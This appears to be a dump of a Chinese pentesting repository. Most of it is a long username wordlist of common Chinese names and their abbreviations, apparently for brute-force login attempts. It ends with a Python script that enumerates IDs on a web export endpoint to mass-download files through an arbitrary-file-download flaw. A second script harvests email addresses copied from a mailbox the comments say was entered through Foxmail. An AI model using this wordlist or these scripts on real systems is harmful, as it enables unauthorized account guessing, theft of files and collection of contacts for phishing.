lixiulan 314 | lixl 315 | lxl 316 | lxiulan 317 | zhangchao 318 | zhangc 319 | zc 320 | zchao 321 | wangling 322 | wangl 323 | wl 324 | wling 325 | zhangling 326 | zhangl 327 | zl 328 | zling 329 | lihua 330 | lih 331 | lh 332 | lhua 333 | wangfei 334 | wangf 335 | wf 336 | wfei 337 | zhangyulan 338 | zhangyl 339 | zyl 340 | zyulan 341 | wangguilan 342 | wanggl 343 | wgl 344 | wguilan 345 | wangying 346 | wangy 347 | wy 348 | wying 349 | liuqiang 350 | liuq 351 | lq 352 | lqiang 353 | chenxiuying 354 | chenxy 355 | cxy 356 | cxiuying 357 | liying 358 | liy 359 | ly 360 | lying 361 | lihui 362 | lih 363 | lh 364 | lhui 365 | limei 366 | lim 367 | lm 368 | lmei 369 | chenyong 370 | cheny 371 | cy 372 | cyong 373 | wangxin 374 | wangx 375 | wx 376 | wxin 377 | lifang 378 | lif 379 | lf 380 | lfang 381 | zhangguilan 382 | zhanggl 383 | zgl 384 | zguilan 385 | libo 386 | lib 387 | lb 388 | lbo 389 | yangyong 390 | yangy 391 | yy 392 | yyong 393 | wangxia 394 | wangx 395 | wx 396 | wxia 397 | liguilan 398 | ligl 399 | lgl 400 | lguilan 401 | wangbin 402 | wangb 403 | wb 404 | wbin 405 | lipeng 406 | lip 407 | lp 408 | lpeng 409 | zhangping 410 | zhangp 411 | zp 412 | zping 413 | zhangli 414 | zhangl 415 | zl 416 | zli 417 | zhanghui 418 | zhangh 419 | zh 420 | zhui 421 | zhangyu 422 | zhangy 423 | zy 424 | zyu 425 | liujuan 426 | liuj 427 | lj 428 | ljuan 429 | libin 430 | lib 431 | lb 432 | lbin 433 | wanghao 434 | wangh 435 | wh 436 | whao 437 | chenjie 438 | chenj 439 | cj 440 | cjie 441 | wangkai 442 | wangk 443 | wk 444 | wkai 445 | chenli 446 | chenl 447 | cl 448 | cli 449 | chenmin 450 | chenm 451 | cm 452 | cmin 453 | wangxiuzhen 454 | wangxz 455 | wxz 456 | wxiuzhen 457 | liyulan 458 | liyl 459 | lyl 460 | lyulan 461 | liuxiuying 462 | liuxy 463 | lxy 464 | lxiuying 465 | wangping 466 | wangp 467 | wp 468 | wping 469 | wangping 470 | wangp 471 | wp 472 | wping 473 | zhangbo 474 | zhangb 475 | zb 476 | zbo 477 | liuguiying 478 | liugy 479 | lgy 480 | lguiying 481 | yangxiuying 482 | yangxy 483 | yxy 484 | yxiuying 485 | zhangying 486 | zhangy 487 | zy 488 | zying 489 | yangli 490 | yangl 491 | yl 492 | yli 493 | zhangjian 494 | zhangj 495 | zj 496 | zjian 497 | lijun 498 | lij 499 | lj 500 | ljun 501 | lili 502 | lil 503 | ll 504 | lli 505 | wangbo 506 | wangb 507 | wb 508 | wbo 509 | zhanghong 510 | zhangh 511 | zh 512 | zhong 513 | liudan 514 | liud 515 | ld 516 | ldan 517 | lixin 518 | lix 519 | lx 520 | lxin 521 | wangli 522 | wangl 523 | wl 524 | wli 525 | yangjing 526 | yangj 527 | yj 528 | yjing 529 | liuchao 530 | liuc 531 | lc 532 | lchao 533 | zhangjuan 534 | zhangj 535 | zj 536 | zjuan 537 | yangfan 538 | yangf 539 | yf 540 | yfan 541 | liuyan 542 | liuy 543 | ly 544 | lyan 545 | liuying 546 | liuy 547 | ly 548 | lying 549 | lixue 550 | lix 551 | lx 552 | lxue 553 | lixiuzhen 554 | lixz 555 | lxz 556 | lxiuzhen 557 | zhangxin 558 | zhangx 559 | zx 560 | zxin 561 | wangjian 562 | wangj 563 | wj 564 | wjian 565 | liuyulan 566 | liuyl 567 | lyl 568 | lyulan 569 | liuhui 570 | liuh 571 | lh 572 | lhui 573 | liubo 574 | liub 575 | lb 576 | lbo 577 | zhanghao 578 | zhangh 579 | zh 580 | zhao 581 | zhangming 582 | zhangm 583 | zm 584 | zming 585 | chenyan 586 | cheny 587 | cy 588 | cyan 589 | zhangxia 590 | zhangx 591 | zx 592 | zxia 593 | chenyan 594 | cheny 595 | cy 596 | cyan 597 | yangjie 598 | yangj 599 | yj 600 | yjie 601 | wangshuai 602 | wangs 603 | ws 604 | wshuai 605 | lihui 606 | lih 607 | lh 608 | lhui 609 | wangxue 610 | wangx 611 | wx 612 | wxue 613 | yangjun 614 | yangj 615 | yj 616 | yjun 617 | zhangxu 618 | zhangx 619 | zx 620 | zxu 621 | liugang 622 | liug 623 | lg 624 | lgang 625 | wanghua 626 | wangh 627 | wh 628 | whua 629 | yangmin 630 | yangm 631 | ym 632 | ymin 633 | wangning 634 | wangn 635 | wn 636 | wning 637 | lining 638 | lin 639 | ln 640 | lning 641 | wangjun 642 | wangj 643 | wj 644 | wjun 645 | liuguilan 646 | liugl 647 | lgl 648 | lguilan 649 | liubin 650 | liub 651 | lb 652 | lbin 653 | zhangping 654 | zhangp 655 | zp 656 | zping 657 | wangting 658 | wangt 659 | wt 660 | wting 661 | chentao 662 | chent 663 | ct 664 | ctao 665 | wangyumei 666 | wangym 667 | wym 668 | wyumei 669 | wangna 670 | wangn 671 | wn 672 | wna 673 | zhangbin 674 | zhangb 675 | zb 676 | zbin 677 | chenlong 678 | chenl 679 | cl 680 | clong 681 | lilin 682 | lil 683 | ll 684 | llin 685 | wangyuzhen 686 | wangyz 687 | wyz 688 | wyuzhen 689 | zhangfengying 690 | zhangfy 691 | zfy 692 | zfengying 693 | wanghong 694 | wangh 695 | wh 696 | whong 697 | lifengying 698 | lify 699 | lfy 700 | lfengying 701 | yangyang 702 | yangy 703 | yy 704 | yyang 705 | liting 706 | lit 707 | lt 708 | lting 709 | zhangjun 710 | zhangj 711 | zj 712 | zjun 713 | wanglin 714 | wangl 715 | wl 716 | wlin 717 | chenying 718 | cheny 719 | cy 720 | cying 721 | chenjun 722 | chenj 723 | cj 724 | cjun 725 | liuxia 726 | liux 727 | lx 728 | lxia 729 | chenhao 730 | chenh 731 | ch 732 | chao 733 | zhangkai 734 | zhangk 735 | zk 736 | zkai 737 | wangjing 738 | wangj 739 | wj 740 | wjing 741 | chenfang 742 | chenf 743 | cf 744 | cfang 745 | zhangting 746 | zhangt 747 | zt 748 | zting 749 | yangtao 750 | yangt 751 | yt 752 | ytao 753 | yangbo 754 | yangb 755 | yb 756 | ybo 757 | chenhong 758 | chenh 759 | ch 760 | chong 761 | liuhuan 762 | liuh 763 | lh 764 | lhuan 765 | wangyuying 766 | wangyy 767 | wyy 768 | wyuying 769 | chenjuan 770 | chenj 771 | cj 772 | cjuan 773 | chengang 774 | cheng 775 | cg 776 | cgang 777 | wanghui 778 | wangh 779 | wh 780 | whui 781 | zhangying 782 | zhangy 783 | zy 784 | zying 785 | zhanglin 786 | zhangl 787 | zl 788 | zlin 789 | zhangna 790 | zhangn 791 | zn 792 | zna 793 | zhangyumei 794 | zhangym 795 | zym 796 | zyumei 797 | wangfengying 798 | wangfy 799 | wfy 800 | wfengying 801 | zhangyuying 802 | zhangyy 803 | zyy 804 | zyuying 805 | lihongmei 806 | lihm 807 | lhm 808 | lhongmei 809 | liujia 810 | liuj 811 | lj 812 | ljia 813 | liulei 814 | liul 815 | ll 816 | llei 817 | zhangqian 818 | zhangq 819 | zq 820 | zqian 821 | liupeng 822 | liup 823 | lp 824 | lpeng 825 | wangxu 826 | wangx 827 | wx 828 | wxu 829 | zhangxue 830 | zhangx 831 | zx 832 | zxue 833 | liyang 834 | liy 835 | ly 836 | lyang 837 | zhangxiuzhen 838 | zhangxz 839 | zxz 840 | zxiuzhen 841 | wangmei 842 | wangm 843 | wm 844 | wmei 845 | wangjianhua 846 | wangjh 847 | wjh 848 | wjianhua 849 | liyumei 850 | liym 851 | lym 852 | lyumei 853 | wangying 854 | wangy 855 | wy 856 | wying 857 | liuping 858 | liup 859 | lp 860 | lping 861 | yangmei 862 | yangm 863 | ym 864 | ymei 865 | lifei 866 | lif 867 | lf 868 | lfei 869 | wangliang 870 | wangl 871 | wl 872 | wliang 873 | lilei 874 | lil 875 | ll 876 | llei 877 | lijianhua 878 | lijh 879 | ljh 880 | ljianhua 881 | wangyu 882 | wangy 883 | wy 884 | wyu 885 | chenling 886 | chenl 887 | cl 888 | cling 889 | zhangjianhua 890 | zhangjh 891 | zjh 892 | zjianhua 893 | liuxin 894 | liux 895 | lx 896 | lxin 897 | wangqian 898 | wangq 899 | wq 900 | wqian 901 | zhangshuai 902 | zhangs 903 | zs 904 | zshuai 905 | lijian 906 | lij 907 | lj 908 | ljian 909 | chenlin 910 | chenl 911 | cl 912 | clin 913 | liyang 914 | liy 915 | ly 916 | lyang 917 | chenqiang 918 | chenq 919 | cq 920 | cqiang 921 | zhaojing 922 | zhaoj 923 | zj 924 | zjing 925 | wangcheng 926 | wangc 927 | wc 928 | wcheng 929 | zhangyuzhen 930 | zhangyz 931 | zyz 932 | zyuzhen 933 | chenchao 934 | chenc 935 | cc 936 | cchao 937 | chenliang 938 | chenl 939 | cl 940 | cliang 941 | liuna 942 | liun 943 | ln 944 | lna 945 | wangqin 946 | wangq 947 | wq 948 | wqin 949 | zhanglanying 950 | zhangly 951 | zly 952 | zlanying 953 | zhanghui 954 | zhangh 955 | zh 956 | zhui 957 | liuchang 958 | liuc 959 | lc 960 | lchang 961 | liqian 962 | liq 963 | lq 964 | lqian 965 | yangyan 966 | yangy 967 | yy 968 | yyan 969 | zhangliang 970 | zhangl 971 | zl 972 | zliang 973 | zhangjian 974 | zhangj 975 | zj 976 | zjian 977 | liyun 978 | liy 979 | ly 980 | lyun 981 | zhangqin 982 | zhangq 983 | zq 984 | zqin 985 | wanglanying 986 | wangly 987 | wly 988 | wlanying 989 | liyuzhen 990 | liyz 991 | lyz 992 | lyuzhen 993 | liuping 994 | liup 995 | lp 996 | lping 997 | chenguiying 998 | chengy 999 | cgy 1000 | cguiying 1001 | liuying 1002 | liuy 1003 | ly 1004 | lying 1005 | yangchao 1006 | yangc 1007 | yc 1008 | ychao 1009 | zhangmei 1010 | zhangm 1011 | zm 1012 | zmei 1013 | chenping 1014 | chenp 1015 | cp 1016 | cping 1017 | wangjian 1018 | wangj 1019 | wj 1020 | wjian 1021 | liuhong 1022 | liuh 1023 | lh 1024 | lhong 1025 | zhaowei 1026 | zhaow 1027 | zw 1028 | zwei 1029 | zhangyun 1030 | zhangy 1031 | zy 1032 | zyun 1033 | zhangning 1034 | zhangn 1035 | zn 1036 | zning 1037 | yanglin 1038 | yangl 1039 | yl 1040 | ylin 1041 | zhangjie 1042 | zhangj 1043 | zj 1044 | zjie 1045 | gaofeng 1046 | gaof 1047 | gf 1048 | gfeng 1049 | wangjianguo 1050 | wangjg 1051 | wjg 1052 | wjianguo 1053 | yangyang 1054 | yangy 1055 | yy 1056 | yyang 1057 | chenhua 1058 | chenh 1059 | ch 1060 | chua 1061 | yanghua 1062 | yangh 1063 | yh 1064 | yhua 1065 | wangjianjun 1066 | wangjj 1067 | wjj 1068 | wjianjun 1069 | yangliu 1070 | yangl 1071 | yl 1072 | yliu 1073 | liuyang 1074 | liuy 1075 | ly 1076 | lyang 1077 | wangshuzhen 1078 | wangsz 1079 | wsz 1080 | wshuzhen 1081 | yangfang 1082 | yangf 1083 | yf 1084 | yfang 1085 | lichunmei 1086 | licm 1087 | lcm 1088 | lchunmei 1089 | liujun 1090 | liuj 1091 | lj 1092 | ljun 1093 | wanghaiyan 1094 | wanghy 1095 | why 1096 | whaiyan 1097 | liuling 1098 | liul 1099 | ll 1100 | lling 1101 | chenchen 1102 | chenc 1103 | cc 1104 | cchen 1105 | wanghuan 1106 | wangh 1107 | wh 1108 | whuan 1109 | lidongmei 1110 | lidm 1111 | ldm 1112 | ldongmei 1113 | zhanglong 1114 | zhangl 1115 | zl 1116 | zlong 1117 | chenbo 1118 | chenb 1119 | cb 1120 | cbo 1121 | chenlei 1122 | chenl 1123 | cl 1124 | clei 1125 | wangyun 1126 | wangy 1127 | wy 1128 | wyun 1129 | wangfeng 1130 | wangf 1131 | wf 1132 | wfeng 1133 | wangxiurong 1134 | wangxr 1135 | wxr 1136 | wxiurong 1137 | wangrui 1138 | wangr 1139 | wr 1140 | wrui 1141 | liqin 1142 | liq 1143 | lq 1144 | lqin 1145 | liguizhen 1146 | ligz 1147 | lgz 1148 | lguizhen 1149 | chenpeng 1150 | chenp 1151 | cp 1152 | cpeng 1153 | wangying 1154 | wangy 1155 | wy 1156 | wying 1157 | liufei 1158 | liuf 1159 | lf 1160 | lfei 1161 | wangxiuyun 1162 | wangxy 1163 | wxy 1164 | wxiuyun 1165 | chenming 1166 | chenm 1167 | cm 1168 | cming 1169 | wangguirong 1170 | wanggr 1171 | wgr 1172 | wguirong 1173 | lihao 1174 | lih 1175 | lh 1176 | lhao 1177 | wangzhiqiang 1178 | wangzq 1179 | wzq 1180 | wzhiqiang 1181 | zhangdan 1182 | zhangd 1183 | zd 1184 | zdan 1185 | lifeng 1186 | lif 1187 | lf 1188 | lfeng 1189 | zhanghongmei 1190 | zhanghm 1191 | zhm 1192 | zhongmei 1193 | liufengying 1194 | liufy 1195 | lfy 1196 | lfengying 1197 | liyuying 1198 | liyy 1199 | lyy 1200 | lyuying 1201 | wangxiumei 1202 | wangxm 1203 | wxm 1204 | wxiumei 1205 | lijia 1206 | lij 1207 | lj 1208 | ljia 1209 | wanglijuan 1210 | wanglj 1211 | wlj 1212 | wlijuan 1213 | chenhui 1214 | chenh 1215 | ch 1216 | chui 1217 | zhangtingting 1218 | zhangtt 1219 | ztt 1220 | ztingting 1221 | zhangfang 1222 | zhangf 1223 | zf 1224 | zfang 1225 | wangtingting 1226 | wangtt 1227 | wtt 1228 | wtingting 1229 | wangyuhua 1230 | wangyh 1231 | wyh 1232 | wyuhua 1233 | zhangjianguo 1234 | zhangjg 1235 | zjg 1236 | zjianguo 1237 | lilanying 1238 | lily 1239 | lly 1240 | llanying 1241 | wangguizhen 1242 | wanggz 1243 | wgz 1244 | wguizhen 1245 | lixiumei 1246 | lixm 1247 | lxm 1248 | lxiumei 1249 | chenyulan 1250 | chenyl 1251 | cyl 1252 | cyulan 1253 | chenxia 1254 | chenx 1255 | cx 1256 | cxia 1257 | liukai 1258 | liuk 1259 | lk 1260 | lkai 1261 | zhangyuhua 1262 | zhangyh 1263 | zyh 1264 | zyuhua 1265 | liuyumei 1266 | liuym 1267 | lym 1268 | lyumei 1269 | liuhua 1270 | liuh 1271 | lh 1272 | lhua 1273 | libing 1274 | lib 1275 | lb 1276 | lbing 1277 | zhanglei 1278 | zhangl 1279 | zl 1280 | zlei 1281 | wangdong 1282 | wangd 1283 | wd 1284 | wdong 1285 | lijianjun 1286 | lijj 1287 | ljj 1288 | ljianjun 1289 | liuyuzhen 1290 | liuyz 1291 | lyz 1292 | lyuzhen 1293 | wanglin 1294 | wangl 1295 | wl 1296 | wlin 1297 | lijianguo 1298 | lijg 1299 | ljg 1300 | ljianguo 1301 | liying 1302 | liy 1303 | ly 1304 | lying 1305 | yangwei 1306 | yangw 1307 | yw 1308 | ywei 1309 | liguirong 1310 | ligr 1311 | lgr 1312 | lguirong 1313 | wanglong 1314 | wangl 1315 | wl 1316 | wlong 1317 | liuting 1318 | liut 1319 | lt 1320 | lting 1321 | chenxiulan 1322 | chenxl 1323 | cxl 1324 | cxiulan 1325 | zhangjianjun 1326 | zhangjj 1327 | zjj 1328 | zjianjun 1329 | lixiurong 1330 | lixr 1331 | lxr 1332 | lxiurong 1333 | liuming 1334 | lium 1335 | lm 1336 | lming 1337 | zhoumin 1338 | zhoum 1339 | zm 1340 | zmin 1341 | zhangxiumei 1342 | zhangxm 1343 | zxm 1344 | zxiumei 1345 | lixuemei 1346 | lixm 1347 | lxm 1348 | lxuemei 1349 | huangwei 1350 | huangw 1351 | hw 1352 | hwei 1353 | zhanghaiyan 1354 | zhanghy 1355 | zhy 1356 | zhaiyan 1357 | wangshulan 1358 | wangsl 1359 | wsl 1360 | wshulan 1361 | lizhiqiang 1362 | lizq 1363 | lzq 1364 | lzhiqiang 1365 | yanglei 1366 | yangl 1367 | yl 1368 | ylei 1369 | lijing 1370 | lij 1371 | lj 1372 | ljing 1373 | litingting 1374 | litt 1375 | ltt 1376 | ltingting 1377 | zhangxiurong 1378 | zhangxr 1379 | zxr 1380 | zxiurong 1381 | liujianhua 1382 | liujh 1383 | ljh 1384 | ljianhua 1385 | wanglili 1386 | wangll 1387 | wll 1388 | wlili 1389 | zhaomin 1390 | zhaom 1391 | zm 1392 | zmin 1393 | chenyun 1394 | cheny 1395 | cy 1396 | cyun 1397 | lihaiyan 1398 | lihy 1399 | lhy 1400 | lhaiyan 1401 | zhangguirong 1402 | zhanggr 1403 | zgr 1404 | zguirong 1405 | zhangjing 1406 | zhangj 1407 | zj 1408 | zjing 1409 | liuli 1410 | liul 1411 | ll 1412 | lli 1413 | likai 1414 | lik 1415 | lk 1416 | lkai 1417 | zhangyu 1418 | zhangy 1419 | zy 1420 | zyu 1421 | zhangfeng 1422 | zhangf 1423 | zf 1424 | zfeng 1425 | liuxiulan 1426 | liuxl 1427 | lxl 1428 | lxiulan 1429 | zhangzhiqiang 1430 | zhangzq 1431 | zzq 1432 | zzhiqiang 1433 | lilong 1434 | lil 1435 | ll 1436 | llong 1437 | lixiuyun 1438 | lixy 1439 | lxy 1440 | lxiuyun 1441 | lixiufang 1442 | lixf 1443 | lxf 1444 | lxiufang 1445 | lishuai 1446 | lis 1447 | ls 1448 | lshuai 1449 | lixin 1450 | lix 1451 | lx 1452 | lxin 1453 | liuyun 1454 | liuy 1455 | ly 1456 | lyun 1457 | zhanglili 1458 | zhangll 1459 | zll 1460 | zlili 1461 | lijie 1462 | lij 1463 | lj 1464 | ljie 1465 | zhangxiuyun 1466 | zhangxy 1467 | zxy 1468 | zxiuyun 1469 | wangshuying 1470 | wangsy 1471 | wsy 1472 | wshuying 1473 | wangchunmei 1474 | wangcm 1475 | wcm 1476 | wchunmei 1477 | wanghongmei 1478 | wanghm 1479 | whm 1480 | whongmei 1481 | chenbin 1482 | chenb 1483 | cb 1484 | cbin 1485 | liyuhua 1486 | liyh 1487 | lyh 1488 | lyuhua 1489 | liguifang 1490 | ligf 1491 | lgf 1492 | lguifang 1493 | zhangying 1494 | zhangy 1495 | zy 1496 | zying 1497 | chenfei 1498 | chenf 1499 | cf 1500 | cfei 1501 | wangbo 1502 | wangb 1503 | wb 1504 | wbo 1505 | liuhao 1506 | liuh 1507 | lh 1508 | lhao 1509 | huangxiuying 1510 | huangxy 1511 | hxy 1512 | hxiuying 1513 | liuyuying 1514 | liuyy 1515 | lyy 1516 | lyuying 1517 | lishuzhen 1518 | lisz 1519 | lsz 1520 | lshuzhen 1521 | huangyong 1522 | huangy 1523 | hy 1524 | hyong 1525 | zhouwei 1526 | zhouw 1527 | zw 1528 | zwei 1529 | wangxiufang 1530 | wangxf 1531 | wxf 1532 | wxiufang 1533 | wanglihua 1534 | wanglh 1535 | wlh 1536 | wlihua 1537 | wangdandan 1538 | wangdd 1539 | wdd 1540 | wdandan 1541 | libin 1542 | lib 1543 | lb 1544 | lbin 1545 | wangguixiang 1546 | wanggx 1547 | wgx 1548 | wguixiang 1549 | wangkun 1550 | wangk 1551 | wk 1552 | wkun 1553 | liuhui 1554 | liuh 1555 | lh 1556 | lhui 1557 | lixiang 1558 | lix 1559 | lx 1560 | lxiang 1561 | zhangrui 1562 | zhangr 1563 | zr 1564 | zrui 1565 | zhangguizhen 1566 | zhanggz 1567 | zgz 1568 | zguizhen 1569 | wangshuhua 1570 | wangsh 1571 | wsh 1572 | wshuhua 1573 | liushuai 1574 | lius 1575 | ls 1576 | lshuai 1577 | zhangfei 1578 | zhangf 1579 | zf 1580 | zfei 1581 | zhangxiufang 1582 | zhangxf 1583 | zxf 1584 | zxiufang 1585 | wangyang 1586 | wangy 1587 | wy 1588 | wyang 1589 | chenjie 1590 | chenj 1591 | cj 1592 | cjie 1593 | zhangguifang 1594 | zhanggf 1595 | zgf 1596 | zguifang 1597 | zhanglijuan 1598 | zhanglj 1599 | zlj 1600 | zlijuan 1601 | wangrong 1602 | wangr 1603 | wr 1604 | wrong 1605 | wuxiuying 1606 | wuxy 1607 | wxy 1608 | wxiuying 1609 | yangming 1610 | yangm 1611 | ym 1612 | yming 1613 | liguixiang 1614 | ligx 1615 | lgx 1616 | lguixiang 1617 | mali 1618 | mal 1619 | ml 1620 | mli 1621 | liuqian 1622 | liuq 1623 | lq 1624 | lqian 1625 | yangxiulan 1626 | yangxl 1627 | yxl 1628 | yxiulan 1629 | yangling 1630 | yangl 1631 | yl 1632 | yling 1633 | wangxiuhua 1634 | wangxh 1635 | wxh 1636 | wxiuhua 1637 | yangping 1638 | yangp 1639 | yp 1640 | yping 1641 | wangbin 1642 | wangb 1643 | wb 1644 | wbin 1645 | liliang 1646 | lil 1647 | ll 1648 | lliang 1649 | lirong 1650 | lir 1651 | lr 1652 | lrong 1653 | liguizhi 1654 | ligz 1655 | lgz 1656 | lguizhi 1657 | lilin 1658 | lil 1659 | ll 1660 | llin 1661 | liyan 1662 | liy 1663 | ly 1664 | lyan 1665 | lijian 1666 | lij 1667 | lj 1668 | ljian 1669 | wangbing 1670 | wangb 1671 | wb 1672 | wbing 1673 | wangguifang 1674 | wanggf 1675 | wgf 1676 | wguifang 1677 | wangming 1678 | wangm 1679 | wm 1680 | wming 1681 | chenmei 1682 | chenm 1683 | cm 1684 | cmei 1685 | zhangchunmei 1686 | zhangcm 1687 | zcm 1688 | zchunmei 1689 | liyang 1690 | liy 1691 | ly 1692 | lyang 1693 | wangyan 1694 | wangy 1695 | wy 1696 | wyan 1697 | wangdongmei 1698 | wangdm 1699 | wdm 1700 | wdongmei 1701 | liufeng 1702 | liuf 1703 | lf 1704 | lfeng 1705 | lixiuhua 1706 | lixh 1707 | lxh 1708 | lxiuhua 1709 | lidandan 1710 | lidd 1711 | ldd 1712 | ldandan 1713 | yangxue 1714 | yangx 1715 | yx 1716 | yxue 1717 | liuyuhua 1718 | liuyh 1719 | lyh 1720 | lyuhua 1721 | maxiuying 1722 | maxy 1723 | mxy 1724 | mxiuying 1725 | zhanglihua 1726 | zhanglh 1727 | zlh 1728 | zlihua 1729 | zhangshuzhen 1730 | zhangsz 1731 | zsz 1732 | zshuzhen 1733 | lixiaohong 1734 | lixh 1735 | lxh 1736 | lxiaohong 1737 | zhangbo 1738 | zhangb 1739 | zb 1740 | zbo 1741 | wangxin 1742 | wangx 1743 | wx 1744 | wxin 1745 | wangguizhi 1746 | wanggz 1747 | wgz 1748 | wguizhi 1749 | zhaoli 1750 | zhaol 1751 | zl 1752 | zli 1753 | zhangxiuhua 1754 | zhangxh 1755 | zxh 1756 | zxiuhua 1757 | zhanglin 1758 | zhangl 1759 | zl 1760 | zlin 1761 | huangmin 1762 | huangm 1763 | hm 1764 | hmin 1765 | yangjuan 1766 | yangj 1767 | yj 1768 | yjuan 1769 | wangjinfeng 1770 | wangjf 1771 | wjf 1772 | wjinfeng 1773 | zhoujie 1774 | zhouj 1775 | zj 1776 | zjie 1777 | wanglei 1778 | wangl 1779 | wl 1780 | wlei 1781 | chenjianhua 1782 | chenjh 1783 | cjh 1784 | cjianhua 1785 | liumei 1786 | lium 1787 | lm 1788 | lmei 1789 | yangguiying 1790 | yanggy 1791 | ygy 1792 | yguiying 1793 | lishuying 1794 | lisy 1795 | lsy 1796 | lshuying 1797 | chenyuying 1798 | chenyy 1799 | cyy 1800 | cyuying 1801 | yangxiuzhen 1802 | yangxz 1803 | yxz 1804 | yxiuzhen 1805 | sunxiuying 1806 | sunxy 1807 | sxy 1808 | sxiuying 1809 | zhaojun 1810 | zhaoj 1811 | zj 1812 | zjun 1813 | zhaoyong 1814 | zhaoy 1815 | zy 1816 | zyong 1817 | liubing 1818 | liub 1819 | lb 1820 | lbing 1821 | yangbin 1822 | yangb 1823 | yb 1824 | ybin 1825 | liwen 1826 | liw 1827 | lw 1828 | lwen 1829 | chenlin 1830 | chenl 1831 | cl 1832 | clin 1833 | chenping 1834 | chenp 1835 | cp 1836 | cping 1837 | sunwei 1838 | sunw 1839 | sw 1840 | swei 1841 | zhangli 1842 | zhangl 1843 | zl 1844 | zli 1845 | chenjun 1846 | chenj 1847 | cj 1848 | cjun 1849 | zhangnan 1850 | zhangn 1851 | zn 1852 | znan 1853 | liuguizhen 1854 | liugz 1855 | lgz 1856 | lguizhen 1857 | liuyu 1858 | liuy 1859 | ly 1860 | lyu 1861 | liujianjun 1862 | liujj 1863 | ljj 1864 | ljianjun 1865 | zhangshuying 1866 | zhangsy 1867 | zsy 1868 | zshuying 1869 | lihongxia 1870 | lihx 1871 | lhx 1872 | lhongxia 1873 | zhaoxiuying 1874 | zhaoxy 1875 | zxy 1876 | zxiuying 1877 | libo 1878 | lib 1879 | lb 1880 | lbo 1881 | wangli 1882 | wangl 1883 | wl 1884 | wli 1885 | zhangrong 1886 | zhangr 1887 | zr 1888 | zrong 1889 | zhangfan 1890 | zhangf 1891 | zf 1892 | zfan 1893 | wangjianping 1894 | wangjp 1895 | wjp 1896 | wjianping 1897 | zhangguizhi 1898 | zhanggz 1899 | zgz 1900 | zguizhi 1901 | zhangyu 1902 | zhangy 1903 | zy 1904 | zyu 1905 | zhouyong 1906 | zhouy 1907 | zy 1908 | zyong 1909 | zhangkun 1910 | zhangk 1911 | zk 1912 | zkun 1913 | xuwei 1914 | xuw 1915 | xw 1916 | xwei 1917 | wangguihua 1918 | wanggh 1919 | wgh 1920 | wguihua 1921 | liuqin 1922 | liuq 1923 | lq 1924 | lqin 1925 | zhoujing 1926 | zhouj 1927 | zj 1928 | zjing 1929 | xumin 1930 | xum 1931 | xm 1932 | xmin 1933 | liutingting 1934 | liutt 1935 | ltt 1936 | ltingting 1937 | xujing 1938 | xuj 1939 | xj 1940 | xjing 1941 | yanghong 1942 | yangh 1943 | yh 1944 | yhong 1945 | wanglu 1946 | wangl 1947 | wl 1948 | wlu 1949 | zhangshulan 1950 | zhangsl 1951 | zsl 1952 | zshulan 1953 | zhangwen 1954 | zhangw 1955 | zw 1956 | zwen 1957 | yangyan 1958 | yangy 1959 | yy 1960 | yyan 1961 | chenguilan 1962 | chengl 1963 | cgl 1964 | cguilan 1965 | zhouli 1966 | zhoul 1967 | zl 1968 | zli 1969 | lishuhua 1970 | lish 1971 | lsh 1972 | lshuhua 1973 | chenxin 1974 | chenx 1975 | cx 1976 | cxin 1977 | machao 1978 | mac 1979 | mc 1980 | mchao 1981 | liujianguo 1982 | liujg 1983 | ljg 1984 | ljianguo 1985 | liguihua 1986 | ligh 1987 | lgh 1988 | lguihua 1989 | wangfenglan 1990 | wangfl 1991 | wfl 1992 | wfenglan 1993 | lishulan 1994 | lisl 1995 | lsl 1996 | lshulan 1997 | chenxiuzhen 1998 | chenxz 1999 | cxz 2000 | cxiuzhen 2001 | -------------------------------------------------------------------------------- /任意文件下载.py: -------------------------------------------------------------------------------- 1 | //任意文件下载,比如www.baidu.com/down.php?id=1 2 | 3 | #coding= utf-8 4 | import urllib 5 | import requests 6 | import re 7 | i = range(100) 8 | for a in i: 9 | url = "http://www.baidu.com:8000/Liems/ExportWord?pkValue=%s" %a 10 | res = urllib.urlopen(url) 11 | aaaa = res.info() 12 | print aaaa 13 | filenameRe = re.compile(r'Content-Disposition: filename=\"(.*?)\"') 14 | filename = re.findall(filenameRe,str(aaaa)) 15 | for x in filename: 16 | print x 17 | urllib.urlretrieve(url,x) 18 | 19 | //这样就可以根据filename,什么文件就以什么文件名保存在本地。 20 | -------------------------------------------------------------------------------- /整理mail小程序.py: -------------------------------------------------------------------------------- 1 | import re 2 | mail = open('mail2.txt','r') //mail2.txt为杂乱的,复制下来的邮箱记事本 3 | key = r'<(.*?)>' 4 | for m in mail: 5 | m = m.strip() 6 | # print m 7 | q = re.findall(key,m) 8 | for w in q: 9 | print w 10 | 11 | 12 | 13 | 14 | 15 | 哪里用到,比如,我们用foxmail进入了某个邮箱,可是不是qq exmail,不能导出通讯录,咋办?只能一个一个手动的从发件箱,收件箱里把邮件一个一个的抄到记事本里,然后抄完,记事本里肯定是乱糟糟的,里面不仅有我们需要提炼出来的邮箱,格式为xxxx@xxx.com,还有姓名,符号等杂七杂八的东西,那么,上面的程序可以帮助你。:) 16 | --------------------------------------------------------------------------------